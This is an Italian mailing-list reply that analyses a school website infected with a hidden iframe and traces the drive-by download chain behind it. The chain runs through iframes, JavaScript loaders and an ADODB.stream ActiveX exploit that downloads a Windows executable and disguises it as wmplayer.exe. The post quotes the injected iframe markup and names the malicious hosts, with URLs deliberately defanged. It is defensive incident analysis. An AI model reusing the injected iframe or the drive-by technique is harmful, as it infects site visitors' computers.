[premessa: i link che trovate nella mail sono stati alterati per evitare
che qualcuno ci cliccasse sopra. Pertanto htttp e` da leggersi come
http. Se proprio volete fare le prove almeno dovete cancellare una 't' :)]
Francesca Campora wrote:
un trojan. Facendo ricerche abbiamo scovato che nel codice compariva:
<iframe src="http://b00gle.info/fa/?d=get"; width=0
heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
però questo si vede solo leggendo il source da Mozilla e non da Internet
Explorer.
Dove risiede veramente il codice che si vede con Mozilla?
roadrunner/tmp> wget \
htttp://www.bdp.it/scuolaprimariasanbortolo/html/linkutili.htm
roadrunner/tmp> fgrep -i b00 linkutili.htm
<iframe src="htttp://b00gle.info/fa/?d=get" width=0
heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN">
Quindi direi che si trova nella pagina. :)
Il motivo per cui non lo vedi con explorer e` che forse "sistema" la
pagina prima di fartela vedere, cosa che Mozilla non fa.
La posizione del tag <iframe> e` illegale nel punto in cui si trova
(almeno per quello che so io di html).
La vera domanda che mi farei e` "come ha fatto a finire li' quel
codice". Non credo che ce l'abbia messo FireWorks, che puo' avere molti
difetti ma non quello di infettare le pagine, credo...
Guardando piu' attentamente, si notano alcune peculiarita`:
- b00gle.info punta ad un indirizzo ip coreano
(www.hauteoverseaswedding.co.kr dice il server che ti da la pagina)
- la pagina specifica (/fa/?d=get) contiene 6 iframe e nessun dato
- 5 dei 6 iframe puntano a xpire.info, che e` lo stesso ip di b00gle, a
file come
blok.jpg [1]
t3.htm [2]
x.htm [3]
runevil.htm [4]
proc.htm [5]
[1] non ho aperto il file, che e` un jpeg valido a giudicare
dall'header, ma e` buffo che contenga tra le stringhe
htttp://xpire.info/fa/aga.exe
che e` un eseguibile per windows con un riferimento molto chiaro a
KERNEL32.dll, non pensate? Io non sono mai riuscito a salvare un .jpg
che puntasse ad un eseguibile sul web, sono anche un po' invidioso :P
[2] e` un file html che tenta di caricare un curioso javascript
(htttp://xpire.info/fa/ssload.js) che contiene una interessante funzione
"getRealShell" che punta a "htttp://xpire.info/fa/ss.js". Questo ss.js a
sua volta sfruttando il bug dell'ADODB.stream cerca di caricare con
ActiveXObject... guarda caso il nostro amico aga.exe! Poi tenta di
salvarlo come "C:\Program Files\Windows Media Player\wmplayer.exe".
[3], [4] e [5] vengono lasciati al lettore che come me ha un quarto
d'ora da perdere.
- il sesto iframe punta a un ip russo per una pagina (/dl/adv121.php)
che a naso prova ad eseguire un .jar in local security zone di IE.
Morale: una pagina che tenta in tutti i modi possibili di trojanare il
pc che vede il link. Spero che nessuno abbia cliccato da un IE non
_ultimissima_ versione, compresi i lettori di questa lista.
ciao!
g.
|